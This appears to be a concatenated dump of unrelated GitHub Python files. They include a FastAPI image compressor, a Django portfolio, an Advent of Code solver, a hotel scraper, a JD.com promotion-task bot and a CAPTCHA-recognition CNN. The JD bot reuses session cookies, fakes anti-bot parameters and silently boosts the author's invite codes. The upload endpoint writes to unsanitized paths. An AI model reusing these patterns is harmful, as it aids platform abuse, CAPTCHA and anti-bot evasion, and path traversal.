File\nfrom PIL import Image\nimport io\nimport os\n\nfrom starlette.responses import FileResponse\n\napp = FastAPI()\n\nUPLOAD_FOLDER = \"uploaded_images\"\nCOMPRESSED_FOLDER = \"compressed_images\"\nZIP_FOLDER = \"zip_files\"\n\nos.makedirs(UPLOAD_FOLDER, exist_ok=True)\nos.makedirs(COMPRESSED_FOLDER, exist_ok=True)\nos.makedirs(ZIP_FOLDER, exist_ok=True)\n\n\n@app.post(\"/upload/\")\nasync def upload_and_compress_images(file_dir: str, files: List[UploadFile] = File(...)):\n compressed_file_paths = []\n\n if not os.path.exists(F\"{COMPRESSED_FOLDER}/{file_dir}\"):\n os.makedirs(F\"{COMPRESSED_FOLDER}/{file_dir}\", exist_ok=True)\n\n for file in files:\n # Read the uploaded image\n image = Image.open(file.file)\n\n # Convert to RGB mode if image is in RGBA mode\n if image.mode == \"RGBA\":\n image = image.convert(\"RGB\")\n\n # Compress the image\n compressed_image = compress_image(image, max_size=1024) # Maximum size in KB (1MB)\n\n # Save the compressed image to a file\n pprint(compressed_image)\n compressed_file_path = os.path.join(f\"{COMPRESSED_FOLDER}/{file_dir}\", file.filename)\n compressed_image.save(compressed_file_path, format=\"JPEG\", quality=85)\n compressed_file_paths.append(compressed_file_path)\n\n return compressed_file_paths\n\n\ndef compress_image(image, max_size):\n # Reduce the quality of the image until its size is below the desired limit\n while True:\n buffer = 
io.BytesIO()\n image.save(buffer, format=\"JPEG\", quality=85) # Adjust quality as needed\n buffer_size = len(buffer.getvalue())\n\n if buffer_size <= max_size * 1024: # Convert max_size to bytes\n break\n\n # Reduce quality further\n image = image.resize((int(image.width * 0.9), int(image.height * 0.9)))\n\n return image\n\n\n@app.get(\"/download_zip/\")\nasync def download_zip(file_dir: str):\n zip_file_path = os.path.join(ZIP_FOLDER, \"compressed_images.zip\")\n\n # Create a zip archive containing all compressed images\n with zipfile.ZipFile(zip_file_path, \"w\") as zipf:\n for root, _, files in os.walk(F\"{COMPRESSED_FOLDER}/{file_dir}\"):\n for file in files:\n file_path = os.path.join(root, file)\n zipf.write(file_path, os.path.relpath(file_path, F\"{COMPRESSED_FOLDER}/{file_dir}\"))\n\n return FileResponse(zip_file_path, filename=\"compressed_images.zip\")\n\n\nif __name__ == \"__main__\":\n import uvicorn\n\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n","repo_name":"mrizkyff/bulk-image-compress","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21880317999","text":"'''\nCreated on Nov 24, 2015\n\n@author: sayed.hussain\n'''\nfrom database.AdvanceSearchDB import check\ndef advanced_search():\n try:\n source=input(\"Enter the source: \")\n destination=input(\"Enter the destinaton: \")\n check(source,destination)\n except Exception as e:\n print(\"some error\")\n print(e)","repo_name":"sayedhussain/Airline-and-Hotel-Reservation-System-Using-python","sub_path":"Flight_Project/functionality/AdvanceSearch.py","file_name":"AdvanceSearch.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14964720816","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport datetime,random\nfrom vivek.models import Contact\n# Create your views here.\ndef index(request):\n count=random.randint(1000,5000)\n time = datetime.datetime.now()\n con={'time':time,\"count\":count}\n return render(request,'vivek/home.html',con)\ndef contact(request):\n if request.method==\"POST\":\n print(request)\n name=request.POST.get('name')\n email=request.POST.get('email')\n phone=request.POST.get('phone')\n subject=request.POST.get('subject')\n print(name,\" \",email)\n contact=Contact()\n contact.name=name\n contact.email=email\n contact.phone=phone\n contact.subject=subject\n contact.save()\n return render(request,'vivek/thanks.html')\n\n \n\n return render(request,'vivek/contact.html')\n\ndef project(request):\n return render(request, 'vivek/projects.html')\n","repo_name":"vivek-nagre/portfolio_dj","sub_path":"Portfolio/vivek/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18080364820","text":"\"\"\" \n--- Day 8: Treetop Tree House ---\nHow many trees are visible from outside the grove? 
\n\"\"\"\n\nfrom typing import List\n\nwith open(\"/Users/fleigh/Projects/AdventofCode/Dec_8/Data.txt\") as f:\n data = f.read().splitlines()\n\n# initiate the puzzle matrix and size variables\npuzzle: List = []\nfor el in data:\n row = list(el)\n puzzle.append([int(num) for num in row])\n\n\ndef print_matrix(matrix): # practice traversing a matrix\n for i, row in enumerate(matrix):\n for j, element in enumerate(row):\n print(element, i, j)\n# print(print_matrix(puzzle))\n\n\n# Initialize direction vectors\nnRow: List = [0, 1, 0, -1]\nnCol: List = [-1, 0, 1, 0]\nROW_MAX: int = len(puzzle[0])\nCOL_MAX: int = len(puzzle)\nvisited: List = [[False for i in range(ROW_MAX)] for j in range(COL_MAX)]\n\n\ndef is_valid(row:int, col:int): # helper function to confirm if a coordinate is in-bounds\n global ROW_MAX, COL_MAX, visited\n\n # if cell is out of bounds\n if (row < 0 or col < 0 or row >= ROW_MAX or col >= COL_MAX):\n return False\n\n # otherwise, it is valid\n return True\n\ndef is_visited(row:int, col:int): # helper function to confirm if a coordinate is unvisited\n global ROW_MAX, COL_MAX, visited\n\n # if the cell is already visited\n if (visited[row][col]):\n return False\n\n # otherwise, it can be visited\n return True\n\n\ndef is_visible(current: List, neighbors: List, matrix, directions, at_boundary): # helper function to confirm if tree is visible from outside grove\n # default is the tree is visible (directions=[True, True, True, True])\n # default is the neighbor is not on the boundary (at_boundary=[False, False, False, False)\n\n curr_height = matrix[current[0]][current[1]]\n\n # check current visiblity of tree\n for i, el in enumerate(neighbors):\n\n # if it is out of range its at the boundary\n if (is_valid(el[0], el[1]) == False):\n at_boundary[i] = True\n continue\n\n neighbor_height = matrix[el[0]][el[1]]\n\n # if the neighbor is taller then it blocks the current tree from that direction\n if neighbor_height >= curr_height:\n directions[i] = False\n\n # base case: if all directions have a tree that blocks view, the tree is not visible\n if all(item is False for item in directions):\n return False\n\n # base case: if all directions have found the boundary and function is still going, the tree is visible\n if all(item is True for item in at_boundary):\n return True\n\n # else increment neighbors\n # neighbors example [[3,2], [4,3], [3, 4], [2, 3]]\n next_neighbors = neighbors\n next_neighbors[0][1] -= 1 # send north more north\n next_neighbors[1][0] += 1 # send east more east\n next_neighbors[2][1] += 1 # send south more south\n next_neighbors[3][0] -= 1 # send west more west\n\n # and recursively call this function until a coordinate is invalid\n is_visible(current, next_neighbors, matrix, directions, at_boundary)\n\n\n\ndef DFS_traversal(row: int, col: int, matrix): # DFS traversal function to visit every tree once\n global nRow, nCol, visited\n visible_tree_count = 0\n tree_visited_count = 0\n\n # initialize a stack of pairs\n stack: List = []\n stack.append([row, col])\n\n while (len(stack) > 0):\n curr: List = stack.pop()\n row: int = curr[0]\n col: int = curr[1]\n\n # check if current is valid or not\n if (is_valid(row, col) == False):\n continue # skip\n\n # check if current is visited or not\n if (is_visited(row, col) == False):\n continue # skip\n\n # set neighbors back to empty\n neighbors: List = []\n\n # collect neighbors in stack and neighbors array\n for i in range(4):\n neighbor_row: int = row + nRow[i]\n neighbor_col: int = col + nCol[i]\n # neighbor_height = 
matrix[neighbor_row][neighbor_col]\n stack.append([neighbor_row, neighbor_col])\n neighbors.append([neighbor_row, neighbor_col])\n\n # check if tree is visible\n directions = [True, True, True, True]\n at_boundary = [False, False, False, False]\n if (is_visible(curr, neighbors, matrix ,directions, at_boundary) == True):\n visible_tree_count += 1\n\n # add current to visited\n visited[row][col] = True\n tree_visited_count += 1\n\n return 'visible trees:', visible_tree_count,'trees visited: ', tree_visited_count\n\n# function call\nprint(DFS_traversal(0, 0, puzzle))\n","repo_name":"forestleigh/advent-of-code-2022","sub_path":"Dec_8/tree_house.py","file_name":"tree_house.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3658241933","text":"# -*- coding: utf-8 -*-\nimport scrapy\n# from selenium import webdriver\nfrom scrapy.spiders.crawl import CrawlSpider\nimport time\n\n\nclass EskySpider(CrawlSpider):\n name = \"esky-hr\"\n allowed_domains = [\"esky.hr\", \"esky.com\"]\n base_url = \"https://www.esky.hr\"\n start_urls = [\"https://www.esky.hr/hoteli/ci/spu/hoteli-split\"]\n\n def __init__(self):\n CrawlSpider.__init__(self)\n self.browser = webdriver.Firefox()\n\n def __del__(self):\n self.browser.close()\n\n def parse(self, response: scrapy.http.response.html.HtmlResponse):\n self.browser.get(response.url)\n time.sleep(3) # let javascript execute\n body_hxs = scrapy.selector.Selector(text=self.browser.page_source)\n\n for hotel_div in body_hxs.xpath(\"//div[@class='hotel-offer-wrapper']\"):\n hxs = scrapy.selector.Selector(text=hotel_div.extract())\n hotel_name = hxs.xpath(\"//li[@class='hotel-name']/a/span/text()\").get()\n hotel_link = hxs.xpath(\n \"//li[@class='hotel-name']/a[@class='name-link']/@href\"\n ).get()\n yield scrapy.Request(\n self.base_url + hotel_link,\n callback=self.parse_hotel,\n cb_kwargs={\"name\": hotel_name, \"text_eng\": None, \"text_hr\": None},\n )\n\n self.browser.execute_script(\n \"\"\"var link = document.querySelector('a.next');\n if (link) {\n link.click();\n }\"\"\"\n )\n\n def parse_hotel(\n self, response: scrapy.http.response.html.HtmlResponse, name, text_eng, text_hr\n ):\n if text_hr is None:\n text_hr = \"\".join(\n response.xpath(\"//dd[@class='hotel-description']//text()\").extract()\n )\n new_link = response._get_url().replace(\"esky.hr/hoteli\", \"esky.com/hotels\")\n return scrapy.Request(\n new_link,\n callback=self.parse_hotel,\n cb_kwargs={\"name\": name, \"text_eng\": None, \"text_hr\": text_hr},\n )\n else:\n text_eng = \"\".join(\n response.xpath(\"//dd[@class='hotel-description']//text()\").extract()\n )\n if text_hr != text_eng:\n return {\n \"name\": name,\n \"text_eng\": text_eng.strip(),\n \"text_hr\": text_hr.strip(),\n }\n else:\n return None\n","repo_name":"nlitkowski/PJN","sub_path":"croatia/croatia/spiders/esky.py","file_name":"esky.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5996865990","text":"from email import header\nimport os\nimport urllib\nimport requests\nimport time\nimport json\nimport random\nimport re\nfrom urllib import parse\nimport urllib3\nimport sys\nfrom datetime import datetime\nurllib3.disable_warnings()\n\n# 循环任务次数,可以多跑几次没事\ntask_times = 5\n# 间隔时间,默认在任务所需的基础上加,一般设置5s左右就成,看自己\nsleep_times = 5\n\n\nCookies = [\n 'pt_key=xxxx; pt_pin=xxxx;',\n 'pt_key=xxxx; pt_pin=xxxx;',\n]\n\nclass 
Logger(object):\n def __init__(self, filename='app.log', stream=sys.stdout):\n self.terminal = stream\n self.log = open(filename, 'a', encoding='utf-8')\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message)\n self.terminal.flush() # 不启动缓冲,实时输出\n self.log.flush()\n\n def flush(self):\n pass\n\ntoday = datetime.now().strftime(\"%Y-%m-%d\")\nsys.stdout = Logger(f'./jd11-{today}.log', sys.stdout)\nsys.stderr = Logger(f'./jd11-{today}.log', sys.stderr)\n\ntry:\n pass\n # with open('ck.txt', 'r+', encoding='utf-8') as ef:\n # for i in ef:\n # i = i.strip('\\r\\n')\n # Cookies.append(i)\nexcept:\n print('看看有ck.txt文件没,看看放cookie没')\n time.sleep(5)\n sys.exit()\nif Cookies:\n pass\nelse:\n print('看看放cookie没')\n time.sleep(5)\n sys.exit()\n\n\ndef get_user_name(headers):\n cookie = headers['Cookie'] if 'Cookie' in headers else 'None'\n try:\n r = re.compile(r\"pt_pin=(.*?);\")\n userName = r.findall(cookie)\n userName = parse.unquote(userName[0])\n return userName\n except Exception as e:\n r = re.compile(r\"pin=(.*?);\")\n userName = r.findall(cookie)\n userName = parse.unquote(userName[0])\n return userName\n\n# 获取joytoken\ndef get_joytoken(headers):\n url = 'https://rjsb-token-m.jd.com/gettoken'\n data = \"content={\\\"appname\\\":\\\"50168\\\",\\\"whwswswws\\\":\\\"\\\",\\\"jdkey\\\":\\\"a\\\",\\\"body\\\":{\\\"platform\\\":\\\"1\\\",\\\"sceneid\\\":\\\"CXJAssist_h5\\\",\\\"hs\\\":\\\"AAD71C9\\\",\\\"version\\\":\\\"w4.0.5\\\"}}\"\n try:\n res = requests.post(url, headers=headers,\n data=data, verify=False).json()\n joytoken = res.get('joyytoken')\n return joytoken\n except Exception as e:\n print(e)\n return None\n\nprint('\\n\\n欢迎使用jd脚本\\n')\n\ndef get_secretp(headers):\n url = 'https://api.m.jd.com/client.action?advId=promote_getHomeData'\n data = 'functionId=promote_getHomeData&client=m&clientVersion=-1&appid=signed_wh5&body={}'\n try:\n res = requests.post(url, data=data, headers=headers,\n verify=False, timeout=5).json()\n if res.get('data').get('bizCode') == 0:\n return res.get('data').get('result').get('homeMainInfo').get('secretp')\n else:\n print('初始化失败')\n return None\n except:\n return None\n\ndef get_ss():\n import random,string\n a = [''.join(random.sample(string.ascii_letters + string.digits, 8)),\"-1\"]\n return a\n\n# 逛店\ndef guangdian(taskId, taskToken, itemId, headers,actionType):\n url = 'https://api.m.jd.com/client.action?advId=promote_collectScore'\n ss = get_ss()\n body = {\n \"taskId\": taskId,\n \"taskToken\": taskToken,\n \"actionType\": actionType,\n \"random\": ss[0],\n \"log\": ss[1]\n }\n bodys = json.dumps(body).replace(\" \", \"\")\n data = 'functionId=promote_collectScore&client=m&clientVersion=-1&appid=signed_wh5&body=' + bodys\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n if res.get('data').get('bizCode') == 0:\n print('进店成功')\n return res\n else:\n print(res.get('data').get('bizMsg'))\n except Exception as e:\n print(e)\n\n# 领取\n\n\ndef lingqu(taskToken, headers):\n url = 'https://api.m.jd.com/client.action?functionId=qryViewkitCallbackResult&client=wh5'\n body = {\n 'dataSource': \"newshortAward\",\n 'method': \"getTaskAward\",\n 'reqParams': \"{\\\"taskToken\\\":\\\"%s\\\"}\" % taskToken,\n 'sdkVersion': \"1.0.0\",\n 'clientLanguage': \"zh\",\n }\n bodys = json.dumps(body)\n data = {\n 'body': bodys,\n }\n try:\n response = requests.post(url, headers=headers,\n data=data, verify=False, timeout=5).json()\n if response.get('code') == '0':\n 
print(response.get('toast').get('subTitle'))\n else:\n print('其他')\n except Exception as e:\n print(e)\n\n# 加购\n\n\ndef getFeedDetail(taskId, headers):\n url = 'https://api.m.jd.com/client.action?functionId=promote_getFeedDetail'\n data = 'functionId=promote_getFeedDetail&client=m&clientVersion=-1&appid=signed_wh5&body={\"taskId\":\"%s\"}' % taskId\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n productInfoVos = res.get('data').get('result').get(\n 'addProductVos')[0].get('productInfoVos')\n return productInfoVos\n except Exception as e:\n print(e)\n# 加购\n\n\ndef getFeedDetail1(taskId, headers):\n url = 'https://api.m.jd.com/client.action?functionId=promote_getFeedDetail'\n data = 'functionId=promote_getFeedDetail&client=m&clientVersion=-1&appid=signed_wh5&body={\"taskId\":\"%s\"}' % taskId\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n productInfoVos = res.get('data').get(\n 'result').get('taskVos')[0].get('browseShopVo')\n return productInfoVos\n except Exception as e:\n print(e)\n\n# 任务奖励\ndef getBadgeWard(awardToken, headers):\n url = 'https://api.m.jd.com/client.action?functionId=promote_getBadgeAward'\n data = 'functionId=promote_getFeedDetail&client=m&clientVersion=-1&appid=signed_wh5&body={\"awardToken\":\"%s\"}' % awardToken\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n myAwardVo = res.get('data').get('result').get('myAwardVos')[0]\n return myAwardVo\n except Exception as e:\n print(e)\n\n\n# 任务列表\n\n\ndef task_list(headers, data):\n global inviteId_temp_list\n url = \"https://api.m.jd.com/client.action?functionId=promote_getTaskDetail\"\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n if res.get('code') == 0:\n taskVos = res.get('data').get('result')\n inviteId = taskVos.get(\"inviteId\")\n if inviteId is not None and inviteId not in inviteId_temp_list:\n inviteId_temp_list.append(inviteId)\n print(f'账号:{get_user_name(headers)},助力码:{inviteId}')\n return taskVos\n else:\n print(res.get('msg'))\n except Exception as e:\n print(e)\n\n\ndef vxtask_list(headers, data):\n try:\n taskVos = task_list(headers, data).get('taskVos')\n lists = []\n for i in taskVos:\n taskId = i.get('taskId')\n status = i.get('status')\n taskTitle = i.get('taskName')\n if status == 1:\n waitDuration = i.get('waitDuration')\n shoppingActivityVos = i.get('shoppingActivityVos', '')\n browseShopVos = i.get('browseShopVo', '')\n followShopVos = i.get('followShopVo', '')\n simpleRecordInfoVos = i.get('simpleRecordInfoVo', '')\n # shoppingActivityVos 需领取\n if taskId in [6, 8, 9, 12, 33, 34, 35, 36, 67]: #\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n for shop in shoppingActivityVos:\n shopstatus = shop.get('status')\n taskToken = shop.get('taskToken')\n shoptitle = shop.get('title')\n itemId = shop.get('itemId')\n if shopstatus == 1:\n print('任务“%s”' % shoptitle)\n guangdian(taskId, taskToken, itemId, headers,1)\n print('等待%s秒' % (waitDuration + sleep_times))\n time.sleep(int(waitDuration + sleep_times))\n lingqu(taskToken, headers)\n # shoppingActivityVos 无需领取\n if taskId in [2, 7, 10, 11, 13, 30, 32, 37, 38, 39, 64, 65]:\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n for shop in shoppingActivityVos:\n shopstatus = shop.get('status')\n taskToken = shop.get('taskToken')\n shoptitle = shop.get('title')\n itemId = shop.get('itemId')\n if shopstatus == 1:\n print('任务“%s”' % 
shoptitle)\n guangdian(taskId, taskToken, itemId, headers,1)\n print('等待%s秒' % (waitDuration + sleep_times))\n time.sleep(int(waitDuration + sleep_times))\n if taskId in [3]:\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n for browseShop in browseShopVos:\n browsestatus = browseShop.get('status')\n browsetaskToken = browseShop.get('taskToken')\n shopName = browseShop.get('shopName')\n shopId = browseShop.get('shopId')\n if browsestatus == 1:\n print('任务“%s”' % shopName)\n guangdian(taskId, browsetaskToken, shopId, headers,1)\n print('等待%s秒' % (waitDuration + sleep_times))\n time.sleep(int(waitDuration + sleep_times))\n lingqu(browsetaskToken, headers)\n # 加购\n if taskId in [16, 17, 18, 19, 20, 21, 22, 23]:\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n productInfoVos = getFeedDetail(taskId, headers)\n for productInfoVo in productInfoVos:\n itemId = productInfoVo.get('itemId')\n taskToken = productInfoVo.get('taskToken')\n skuName = productInfoVo.get('skuName')\n status = productInfoVo.get('status')\n if status == 1:\n print('开始加购“%s”' % skuName)\n ress = guangdian(\n taskId, taskToken, itemId, headers,1)\n times = ress.get('data').get('result').get('times')\n if times == 4:\n break\n print('等待%s秒' % sleep_times)\n time.sleep(sleep_times)\n if taskId in [4]:\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n browseShopVos = getFeedDetail1(taskId, headers)\n for browseShopVo in browseShopVos:\n itemId = browseShopVo.get('itemId')\n taskToken = browseShopVo.get('taskToken')\n status = browseShopVo.get('status')\n shopName = browseShopVo.get('shopName')\n if status == 1:\n print('开始逛“%s”' % shopName)\n ress = guangdian(\n taskId, taskToken, itemId, headers,1)\n times = ress.get('data').get('result').get('times')\n if times == 5:\n break\n print('等待%s秒' % sleep_times)\n time.sleep(sleep_times)\n if taskId in [28, 61]:\n print(f'>>>>>>[{get_user_name(headers)}]开始进行{taskTitle}任务')\n taskToken = simpleRecordInfoVos.get('taskToken')\n itemId = simpleRecordInfoVos.get('itemId')\n guangdian(taskId, taskToken, itemId, headers,1)\n print('等待%s秒' % (waitDuration + sleep_times))\n time.sleep(int(waitDuration + sleep_times))\n guangdian(taskId, taskToken, itemId, headers,'')\n if taskId == 5:\n taskToken = i.get('simpleRecordInfoVo').get('taskToken')\n ii = 0\n while ii <= 4:\n ress = guangdian(5, taskToken, '', headers,1)\n ii += 1\n time.sleep(sleep_times)\n\n if status == 2:\n print(taskTitle + '任务已完成')\n lotteryTaskVos = task_list(headers, data).get('lotteryTaskVos')\n if lotteryTaskVos is None:\n return\n badge_task_list = lotteryTaskVos[0].get(\"badgeAwardVos\")\n for task in badge_task_list:\n if task.get('status') != 3:\n continue\n awardVo = getBadgeWard(task.get(\"awardToken\"), headers)\n print(f\"完成获取任务次数奖励:{awardVo.get('pointVo').get('score')}\")\n print('等待%s秒' % (sleep_times))\n except Exception as e:\n print(e)\n\n# 助力\n\n\ndef jd_zhuli(inviteId, headers):\n ss = get_ss()\n url = 'https://api.m.jd.com/client.action?functionId=promote_collectScore'\n body = {\n \"actionType\": 0,\n \"inviteId\": \"%s\" % inviteId,\n \"random\": ss[0],\n \"log\": ss[1]\n }\n bodys = json.dumps(body)\n data = 'functionId=promote_collectScore&client=m&clientVersion=-1&appid=signed_wh5&body=%s' % bodys\n try:\n res = requests.post(url, headers=headers, data=data,\n verify=False, timeout=5).json()\n if res.get('data').get('bizCode') == 0:\n print('助力成功')\n return res\n else:\n print(res.get('data').get('bizMsg'))\n except:\n print('其他')\n\ndef raise_level(headers):\n 
pass\n\n\ninviteIds = ['ZXASTT0225KkcRx4QplfTKUz1l6UPdQFjRWnqq7zB55awQ', 'ZXASTT012_bkiAkRItguJFjRWnqq7zB55awQ', 'ZXASTT01597g7GU9KrQGJYUMFjRWnqq7zB55awQ', 'ZXASTT0146Lh2RRwZrw2JdwFjRWnqq7zB55awQ']\ninviteId_temp_list = []\n#print('软件放了作者的助力,不想助力的直接输入n 回车即可\\n')\n#print('是否愿意为作者助力:y/n')\ncontent = 'y'\n\nfor Cookie in Cookies:\n headers = {\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'User-Agent': 'jdapp;iPhone;15.4.1;;;M/5.0;appBuild/168341;Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept': '*/*',\n 'Origin': 'https://h5.m.jd.com/',\n 'Referer': 'https://h5.m.jd.com/',\n 'Cookie': Cookie\n }\n joyToken = get_joytoken(headers)\n Cookie = Cookie + ';joyytoken=50168' + joyToken\n headers['Cookie'] = Cookie\n i = 0\n while i < task_times:\n # 京东app任务\n jddata = 'functionId=promote_getTaskDetail&client=m&clientVersion=-1&appid=signed_wh5&body={\"appSign\":\"3\"}'\n vxtask_list(headers, jddata)\n # 微信任务\n wxdata = 'functionId=promote_getTaskDetail&client=m&clientVersion=-1&appid=signed_wh5&body={\"appSign\":\"2\"}'\n vxtask_list(headers, wxdata)\n # 升级转盘\n raise_level(headers)\n i += 1\n if content != 'n':\n for inviteId in inviteIds:\n jd_zhuli(inviteId, headers)\n time.sleep(sleep_times * 2)\n\nprint(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(int(time.time()))))\n","repo_name":"crazyzzcc/jd-scripts-docker-4","sub_path":"py/jd11_2022.py","file_name":"jd11_2022.py","file_ext":"py","file_size_in_byte":16162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12791483266","text":"import os\nimport sys\nimport re\nimport time\nimport shutil\nimport random\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as D\nfrom tqdm import tqdm\nfrom const import DATA_CROP_DIR, DATA_TRAIN_DIR, DATA_TEST_DIR, MODEL_DIR, LOG_DIR\n\nCAPTCHA_LABELS = '2345678abcdefghklmnpqrstuvwxy'\nCAPTCHA_SIZE = 52\n\nre_dataset_filename = re.compile(r'^([a-z0-9]{4})_c(\\d)_([a-z0-9])_(\\d+\\-\\d+)\\.png$')\nlogfp = None\n\nclass CaptchaDataset(D.Dataset):\n\n def __init__(self, folder, train_set):\n N = CAPTCHA_SIZE\n captcha_labels_set = frozenset(CAPTCHA_LABELS)\n captcha_labels_indices = np.empty(0x80, dtype=np.uint8)\n\n if train_set:\n Mrot_list = [\n cv2.getRotationMatrix2D((N // 2, N // 2), 7.5 * i, 1.0)\n for i in range(-4, 5)\n ]\n\n for ix, c in enumerate(CAPTCHA_LABELS):\n captcha_labels_indices[ord(c)] = ix\n\n Xlist = []\n ylist = []\n\n for filename in tqdm(sorted(os.listdir(folder))):\n ## TEST ONLY !\n # sep = 0.01 if train_set else 0.01 * 4\n # if np.random.random() > sep:\n # continue\n\n mat = re_dataset_filename.match(filename)\n assert mat is not None, filename\n\n filepath = os.path.join(folder, filename)\n X = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE)\n y = mat.group(3)\n\n assert X.shape == (N, N), X.shape\n assert y in captcha_labels_set, y\n\n y = captcha_labels_indices[ord(y)]\n\n if train_set:\n for Mrot in Mrot_list:\n Xrot = cv2.warpAffine(X, Mrot, X.shape)\n Xlist.append(Xrot)\n ylist.append(y)\n else:\n Xlist.append(X)\n ylist.append(y)\n\n self.X = np.array(Xlist, dtype=np.float32).reshape(-1, 1, N, N)\n self.y = np.array(ylist, dtype=np.int64)\n\n def __len__(self):\n return len(self.X)\n\n def __getitem__(self, ix):\n return self.X[ix], 
self.y[ix]\n\n\nclass CaptchaCNN(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.bn0 = nn.BatchNorm2d(1)\n self.bn1 = nn.BatchNorm2d(16)\n self.bn2 = nn.BatchNorm2d(32)\n self.bn3 = nn.BatchNorm2d(64)\n self.bn4 = nn.BatchNorm2d(128)\n self.bn5 = nn.BatchNorm2d(256)\n self.bn6 = nn.BatchNorm2d(512)\n self.conv1 = nn.Conv2d(1, 16, 3)\n self.conv2 = nn.Conv2d(16, 32, 3)\n self.conv3 = nn.Conv2d(32, 64, 3)\n self.conv4 = nn.Conv2d(64, 128, 3)\n self.conv5 = nn.Conv2d(128, 256, 3)\n self.conv6 = nn.Conv2d(256, 512, 3)\n self.fc1 = nn.Linear(2048, 512)\n self.fc2 = nn.Linear(512, 128)\n self.fc3 = nn.Linear(128, len(CAPTCHA_LABELS)) # 29\n\n def forward(self, x):\n x = self.bn0(x) # batch*1*52*52\n x = F.relu(x)\n x = self.conv1(x) # batch*16*50*50\n x = self.bn1(x)\n x = F.relu(x)\n x = self.conv2(x) # batch*32*48*48\n x = self.bn2(x)\n x = F.relu(x)\n x = F.avg_pool2d(x, 2) # batch*32*24*24\n x = self.conv3(x) # batch*64*22*22\n x = self.bn3(x)\n x = F.relu(x)\n x = self.conv4(x) # batch*128*20*20\n x = self.bn4(x)\n x = F.relu(x)\n x = F.avg_pool2d(x, 2) # batch*128*10*10\n x = self.conv5(x) # batch*256*8*8\n x = self.bn5(x)\n x = F.relu(x)\n x = F.avg_pool2d(x, 2) # batch*256*4*4\n x = self.conv6(x) # batch*512*2*2\n x = self.bn6(x)\n x = F.relu(x)\n x = torch.flatten(x, 1) # batch*2048\n x = self.fc1(x) # batch*512\n x = F.relu(x)\n x = self.fc2(x) # batch*128\n x = F.relu(x)\n x = self.fc3(x) # batch*29\n x = F.log_softmax(x, dim=1)\n return x\n\n\ndef cnn_train(model, train_loader, optimizer, epoch):\n log_interval = max(1, int(len(train_loader) * 0.05))\n\n model.train()\n\n for ix, (data, target) in enumerate(train_loader):\n if torch.cuda.is_available():\n data = data.cuda()\n target = target.cuda()\n\n optimizer.zero_grad()\n output = model(data)\n\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n if ix % log_interval == 0:\n line = 'Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch,\n ix * len(data),\n len(train_loader.sampler),\n 100.0 * ix / len(train_loader),\n loss.item()\n )\n print(line, file=sys.stdout, flush=True)\n print(line, file=logfp, flush=True)\n\n\ndef cnn_test(model, test_loader, epoch):\n test_loss = 0\n correct = 0\n confusion_matrix = np.zeros((len(CAPTCHA_LABELS), len(CAPTCHA_LABELS)), dtype=np.int)\n\n model.eval()\n\n with torch.no_grad():\n for Xlist, ylist in test_loader:\n if torch.cuda.is_available():\n Xlist = Xlist.cuda()\n ylist = ylist.cuda()\n\n output = model(Xlist)\n test_loss += F.nll_loss(output, ylist).item() / len(test_loader.sampler)\n ypred = output.argmax(dim=1, keepdim=True)\n correct += ypred.eq(ylist.view_as(ypred)).sum().item()\n for t, p in zip(ylist.view(-1), ypred.view(-1)):\n confusion_matrix[t.long(), p.long()] += 1\n\n line = '\\nTest set: Average loss: {:.6f}, Accuracy: {}/{} ({:.4f}%)'.format(\n test_loss,\n correct,\n len(test_loader.sampler),\n 100.0 * correct / len(test_loader.sampler)\n )\n print(line, file=sys.stdout, flush=True)\n print(line, file=logfp, flush=True)\n\n df = pd.DataFrame(\n data=confusion_matrix,\n index=list(CAPTCHA_LABELS),\n columns=list(CAPTCHA_LABELS),\n )\n filepath = os.path.join(LOG_DIR, \"confusion_matrix.epoch_%d.csv\" % epoch)\n df.to_csv(filepath)\n\n\ndef build_train_test_set(train_size):\n shutil.rmtree(DATA_TRAIN_DIR)\n os.mkdir(DATA_TRAIN_DIR)\n shutil.rmtree(DATA_TEST_DIR)\n os.mkdir(DATA_TEST_DIR)\n\n train_cnt = 0\n test_cnt = 0\n\n for filename in tqdm(sorted(os.listdir(DATA_CROP_DIR))):\n src = 